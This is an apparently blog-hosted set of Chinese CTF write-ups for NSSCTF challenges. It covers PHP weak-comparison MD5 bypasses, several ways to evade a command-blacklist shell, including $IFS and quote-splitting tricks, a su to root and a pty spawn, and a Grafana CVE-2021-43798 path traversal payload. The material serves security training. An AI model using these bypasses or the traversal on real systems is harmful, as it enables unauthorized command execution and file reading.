2023-04-18

NSS第一题

image.png
通过阅读代码,可以看出是要求你通过POST请求传递一个id为"wllmNB"参数的同时,通过get请求也传递一个json格式的参数,关键payload如下:

POST /?json={"x":"wllm"} HTTP/1.1
...

id=wllmNB

第二题easy MD5

image.png
POST、GET、MD5匹配

仔细阅读代码发现

if ($name != $password && md5($name) == md5($password)){
        echo $flag;
    } 

既要两变量个值不相同,又要两个变量md5值一样,
可以发现此时判断md5值是否一样用的是==,这是php的弱类型比较,
方法一: 可以使用带0e开头的数字穿进行传递参数,
        因为php会将0e开头的数字转化为0,故此时md5值相等,而两个变量值不相等;
方法二: 可以传递数组,如name[]=123,password[]=456,md5不能加密数组,故两个md5返回的都是null

另:若遇到===这样的强类型比较,方法一就失效了,
    方法二仍然有效,或者还可以使用软件fastcoll进行md5碰撞,生成两个字符串使得他们的md5值相同

nc签到题

直接nc连接就可以

nc 1.14.71.254 28184

root@2837d425b7c744ca:/# cat mai
cat main.py 
import os

art = '''

   ((  "####@@!!$$    ))
       `#####@@!$$`  ))
    ((  '####@!!$:
   ((  ,####@!!$:   ))
       .###@!!$:
       `##@@!$:
        `#@!!$
  !@#    `#@!$:       @#$
   #$     `#@!$:       !@!
            '@!$:
        '`\   "!$: /`'
           '\  '!: /'
             "\ : /"
  -."-/\\\-."//.-"/:`\."-.JrS"."-=_\\
" -."-.\\"-."//.-".`-."_\\-.".-\".-//'''
print(art)
print("My_shell_ProVersion")


blacklist = ['cat','ls',' ','cd','echo','<','${IFS}']

while True:
    command = input()
    for i in blacklist:
        if i in command:
            exit(0)
    os.system(command)

过滤了空格、ls、cat、<等,可以使用引号截断绕过,

pwd
/



l's'
bin
boot
dev
etc
flag
home
lib
lib64
main.py
media
mnt
opt
proc
root
run
run.sh
sbin
srv
sys
tmp
usr
var


c'at'$IFS$9flag



!!!!其他方法!!!!
=======
 a=c;b=a;c=t;$a$b$c$IFS$1flag

nl$IFS$9f*
=======


在bash的shell下,nc完了直接输su,然后没反应,
不用管,继续输cat flag就出来了哈哈哈,不过我试了一下zsh情况下却打不通

su 

id
uid=0(root) gid=0(root) groups=0(root)
zsh

id
uid=0(root) gid=0(root) groups=0(root)
这里以后输入命令就不会有任何限制了

ls
bin
boot
dev

python3 -c "import pty;pty.spawn('/bin/bash')"


root@2837d425b7c744ca:/# ls
ls
bin   dev  flag  lib    main.py  mnt  proc  run     sbin  sys  usr
boot  etc  home  lib64  media    opt  root  run.sh  srv   tmp  var

root@2837d425b7c744ca:/# cat flag
cat flag 
NSSCTF{18d9a291-706e-4f17-9759-90e0af7e985f}
root@2837d425b7c744ca:/# 


NSS 实战

CVE-2021-43798 Grafana任意文件读取
抓包,修改路径
/public/plugins/gauge/../../../../../../../../../flag

image.png
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 194,457评论 5 459
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 81,837评论 2 371
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 141,696评论 0 319
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 52,183评论 1 263
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 61,057评论 4 355
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 46,105评论 1 272
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 36,520评论 3 381
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 35,211评论 0 253
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 39,482评论 1 290
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 34,574评论 2 309
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 36,353评论 1 326
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 32,213评论 3 312
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 37,576评论 3 298
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 28,897评论 0 17
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,174评论 1 250
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 41,489评论 2 341
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 40,683评论 2 335

推荐阅读更多精彩内容

  • 对于时间管理这个事情我觉得我得好好研究一下,因为我自己在时间管理上面其实也是不够细致的,很多时候我发现我自己...
    零下1度的刺猬阅读 51评论 0 1
  • 20230418星期二四点五十《死亡文化与生死教育》王云岭1.2 昨天在学校听了一会王岭云老师讲讲关于死亡的问题,...
    每天坚持阅读 105评论 0 0
  • 调查研究三部曲 调查研究是我们的传家宝,作为基层的部门,要深化贯彻落实,用好调查研究这个法宝,要制定适合自己的工作...
    新青年_04cb阅读 62评论 0 0
  • 水与全球健康和食品安全的关系[https://zhuanlan.zhihu.com/p/622335536] 人生...
    鱼河水阅读 54评论 0 0
  • Science | 改造皮肤细菌诱导抗黑色素瘤的T细胞反应 原创傅坤元图灵基因2023-04-18 10:11发表...
    图灵基因阅读 219评论 0 0